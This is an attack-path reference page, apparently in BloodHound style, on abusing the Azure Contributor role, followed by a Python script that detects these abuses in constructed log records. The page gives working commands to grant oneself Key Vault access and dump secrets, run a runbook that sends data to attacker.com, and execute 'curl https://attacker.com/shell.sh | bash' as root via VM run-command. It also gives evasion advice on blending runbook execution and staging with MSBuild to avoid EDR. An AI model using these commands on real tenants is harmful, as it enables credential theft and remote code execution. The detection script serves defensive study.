AZContributor
The source principal holds the built-in Contributor role on the target Azure resource. Contributor grants full management-plane control (create, read, update, delete of resources and their configuration) but explicitly excludes Microsoft.Authorization/* write and delete, so it cannot assign roles or elevate access. Data-plane access (for example reading Key Vault secrets) is only reachable indirectly, through configuration the role is allowed to change.
Applies to: User / ServicePrincipal → AZSubscription / AZResourceGroup / AZKeyVault / AZAutomationAccount / AZVM / AZResource
Linux Abuse
Key Vault → grant self an access policy and dump secrets
az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>
# Only works when the vault uses the legacy access-policy permission model
# (enableRbacAuthorization is false). On an RBAC-model vault Contributor can
# neither read secrets nor grant itself a data-plane role such as Key Vault Secrets User.
# Grant yourself secret read/list on the vault (<object-id> is your own principal's object ID)
az keyvault set-policy --name <vault-name> \
--object-id <object-id> \
--secret-permissions get list
# List and retrieve secrets
az keyvault secret list --vault-name <vault-name> --query '[].id' -o tsv | \
xargs -I{} az keyvault secret show --id {} --query 'value' -o tsv
Automation Account → create a malicious runbook
# Upload a runbook that exfils credentials or spawns a reverse shell.
# The job runs in the Azure Automation sandbox (or on a Hybrid Worker if one is targeted),
# not on a VM; whoami returns the sandbox identity, and any managed identity or
# stored credential assets of the account are reachable from inside the runbook.
az automation runbook create \
--resource-group <resource-group> \
--automation-account-name <automation-account> \
--name evil-runbook \
--type PowerShell
az automation runbook replace-content \
--resource-group <resource-group> \
--automation-account-name <automation-account> \
--name evil-runbook \
--content 'Invoke-WebRequest -Uri "https://attacker.com/?d=$(whoami)"'
az automation runbook publish \
--resource-group <resource-group> \
--automation-account-name <automation-account> \
--name evil-runbook
az automation runbook start \
--resource-group <resource-group> \
--automation-account-name <automation-account> \
--name evil-runbook
VM → run command as SYSTEM/root
# Windows VM (executed as SYSTEM by the RunCommand extension)
az vm run-command invoke \
--resource-group <resource-group> \
--name <vm-name> \
--command-id RunPowerShellScript \
--scripts "whoami; hostname; cat C:\Users\Administrator\Desktop\root.txt"
# Linux VM (executed as root by the RunCommand extension)
az vm run-command invoke \
--resource-group <resource-group> \
--name <vm-name> \
--command-id RunShellScript \
--scripts "id; cat /root/root.txt; curl https://attacker.com/shell.sh | bash"
Windows Abuse
PowerZure → run command on VM
Connect-AzAccount -AccessToken <access-token> -AccountId <username>
Invoke-AzureRunCommand -ResourceGroup <resource-group> -VM <vm-name> -Command 'whoami'
Invoke-AzureRunMSBuild -ResourceGroup <resource-group> -VM <vm-name>
Invoke-AzureRunProgram -ResourceGroup <resource-group> -VM <vm-name> -Program 'cmd.exe' -Arguments '/c whoami'
Az PowerShell → run command on VM
Invoke-AzVMRunCommand `
-ResourceGroupName <resource-group> `
-VMName <vm-name> `
-CommandId RunPowerShellScript `
-ScriptString 'whoami; hostname'
Key Vault → dump secrets
# Grant access (access-policy model vaults only; <object-id> is your own principal's object ID)
Set-AzKeyVaultAccessPolicy -VaultName <vault-name> -ObjectId <object-id> -PermissionsToSecrets get,list
# Dump
Get-AzKeyVaultSecret -VaultName <vault-name> | ForEach-Object {
$secret = Get-AzKeyVaultSecret -VaultName <vault-name> -Name $_.Name -AsPlainText
Write-Output "$($_.Name) = $secret"
}
Automation Account → steal RunAs certificate
# PowerZure. Run As accounts were retired on 30 September 2023; this only yields a
# certificate on legacy accounts that still carry the AzureRunAsCertificate asset.
Get-AzureRunAsCertificate -ResourceGroup <resource-group> -AutomationAccount <automation-account>
Opsec
- Azure Activity Log records every management-plane write with the caller identity, including the vault access-policy change, runbook create/replace-content/publish/start and the VM runCommand action.
- VM run-command leaves artifacts in the guest OS: the RunCommand extension writes the script to disk (Windows under C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\, Linux under /var/lib/waagent/run-command/), process creation shows up as Event ID 4688 on Windows when process auditing is enabled, and commands may land in shell history on Linux.
- Key Vault data-plane reads (SecretList, SecretGet) are logged per secret with the caller's identity and timestamp in the vault's AuditEvent diagnostic log, but only if diagnostic settings are enabled; the policy grant itself always appears in the Activity Log.
- Prefer replacing the content of an existing scheduled runbook over creating a new one, so execution blends with normal job history.
- EDR on the VM may flag Invoke-AzVMRunCommand payloads, which spawn as children of the RunCommand extension process; use MSBuild (Invoke-AzureRunMSBuild) or other signed binaries to stage execution.
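The detection side of the Opsec notes, as an added example that is not part of the original page: a small Python triage script that scans exported Azure Activity Log records for the management-plane operations the abuse steps above generate, and correlates a Key Vault write with secret reads on the same vault by the same principal (the "grant self, then dump" pattern). The log records are constructed and simplified, not real telemetry; the flattened callerOid field (the oid claim), the 30-minute window and the assumption that az keyvault set-policy / Set-AzKeyVaultAccessPolicy surface as Microsoft.KeyVault/vaults/write are this example's choices.

```python
"""Triage AZContributor abuse paths in exported Azure logs (added example).

Records below are CONSTRUCTED samples that mimic the field names of the
Azure Activity Log and Key Vault AuditEvent diagnostic exports; the values
(subscription, OIDs, resource names) are invented. The callerOid column is
an assumed flattening of the caller's oid claim.
"""
from datetime import datetime, timedelta, timezone

# Management-plane operations (lower-cased) that the commands on this page
# generate, mapped to the abuse step they correspond to. Assumption: the
# access-policy grant is recorded as a vault write.
MGMT_OPS = {
    "microsoft.keyvault/vaults/write": "keyvault vault/access-policy write",
    "microsoft.compute/virtualmachines/runcommand/action": "vm run-command",
    "microsoft.automation/automationaccounts/runbooks/write": "runbook create/replace-content",
    "microsoft.automation/automationaccounts/runbooks/publish/action": "runbook publish",
    "microsoft.automation/automationaccounts/jobs/write": "runbook start (job create)",
}
# Key Vault data-plane operations in the AuditEvent log that read secrets.
SECRET_READ_OPS = {"SecretGet", "SecretList"}

ATTACKER = "11111111-1111-1111-1111-111111111111"   # constructed: SP with Contributor
ADMIN = "22222222-2222-2222-2222-222222222222"      # constructed: legitimate admin
APP = "33333333-3333-3333-3333-333333333333"        # constructed: steady-state consumer
SUB = "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-prod/providers"
KV = SUB + "/Microsoft.KeyVault/vaults/kv-prod"
AA = SUB + "/Microsoft.Automation/automationAccounts/aa-prod"
VM = SUB + "/Microsoft.Compute/virtualMachines/vm-web01"

ACTIVITY_LOG = [  # constructed Activity Log records
    {"time": "2024-04-30T09:00:00Z", "operationName": "Microsoft.KeyVault/vaults/write",
     "callerOid": ADMIN, "resourceId": KV, "status": "Succeeded"},
    {"time": "2024-05-01T10:00:00Z", "operationName": "Microsoft.KeyVault/vaults/write",
     "callerOid": ATTACKER, "resourceId": KV, "status": "Succeeded"},
    {"time": "2024-05-01T10:07:00Z", "operationName": "Microsoft.Automation/automationAccounts/runbooks/write",
     "callerOid": ATTACKER, "resourceId": AA + "/runbooks/evil-runbook", "status": "Succeeded"},
    {"time": "2024-05-01T10:08:00Z", "operationName": "Microsoft.Automation/automationAccounts/runbooks/publish/action",
     "callerOid": ATTACKER, "resourceId": AA + "/runbooks/evil-runbook", "status": "Succeeded"},
    {"time": "2024-05-01T10:09:00Z", "operationName": "Microsoft.Automation/automationAccounts/jobs/write",
     "callerOid": ATTACKER, "resourceId": AA + "/jobs/0001", "status": "Succeeded"},
    {"time": "2024-05-01T10:15:00Z", "operationName": "Microsoft.Compute/virtualMachines/runCommand/action",
     "callerOid": ATTACKER, "resourceId": VM, "status": "Succeeded"},
    {"time": "2024-05-01T11:00:00Z", "operationName": "Microsoft.Compute/virtualMachines/read",
     "callerOid": ATTACKER, "resourceId": VM, "status": "Succeeded"},  # benign read, not flagged
]

KV_AUDIT = [  # constructed Key Vault AuditEvent records (diagnostic settings enabled)
    {"time": "2024-05-01T10:01:00Z", "operationName": "SecretList", "callerOid": ATTACKER, "resourceId": KV},
    {"time": "2024-05-01T10:01:30Z", "operationName": "SecretGet", "callerOid": ATTACKER, "resourceId": KV},
    {"time": "2024-05-01T10:01:31Z", "operationName": "SecretGet", "callerOid": ATTACKER, "resourceId": KV},
    {"time": "2024-05-01T12:00:00Z", "operationName": "SecretGet", "callerOid": APP, "resourceId": KV},
]


def _ts(s):
    """Parse the ISO-8601 UTC timestamp used in the exports."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def flag_management_ops(activity):
    """Return (time, callerOid, step, resourceId) for every succeeded
    Activity Log operation that matches an abuse step on this page."""
    hits = []
    for r in activity:
        step = MGMT_OPS.get(r["operationName"].lower())
        if step and r.get("status") == "Succeeded":
            hits.append((r["time"], r["callerOid"], step, r["resourceId"]))
    return hits


def grant_then_dump(activity, audit, window=timedelta(minutes=30)):
    """Correlate a vault write with secret reads on the same vault by the same
    principal inside `window`. A principal that only writes (admin) or only
    reads (long-standing consumer) is not flagged; doing both in sequence is
    the Contributor self-grant pattern."""
    findings = []
    for w in activity:
        if w["operationName"].lower() != "microsoft.keyvault/vaults/write" or w.get("status") != "Succeeded":
            continue
        t0 = _ts(w["time"])
        reads = [a for a in audit
                 if a["operationName"] in SECRET_READ_OPS
                 and a["callerOid"] == w["callerOid"]
                 and a["resourceId"].lower() == w["resourceId"].lower()
                 and t0 <= _ts(a["time"]) <= t0 + window]
        if reads:
            findings.append({"callerOid": w["callerOid"], "vault": w["resourceId"],
                             "grant_time": w["time"], "secret_reads": len(reads),
                             "ops": [a["operationName"] for a in reads]})
    return findings


if __name__ == "__main__":
    for hit in flag_management_ops(ACTIVITY_LOG):
        print("MGMT  %s %s %s %s" % hit)
    for f in grant_then_dump(ACTIVITY_LOG, KV_AUDIT):
        print("ALERT grant-then-dump by %s on %s: %d reads after %s"
              % (f["callerOid"], f["vault"], f["secret_reads"], f["grant_time"]))
```

In a Log Analytics workspace the same logic maps onto AzureActivity (OperationNameValue, Caller, _ResourceId, ActivityStatusValue) and the vault's AzureDiagnostics AuditEvent rows; the correlation only works where Key Vault diagnostic logging is switched on, which is exactly the gap the Opsec note above points at.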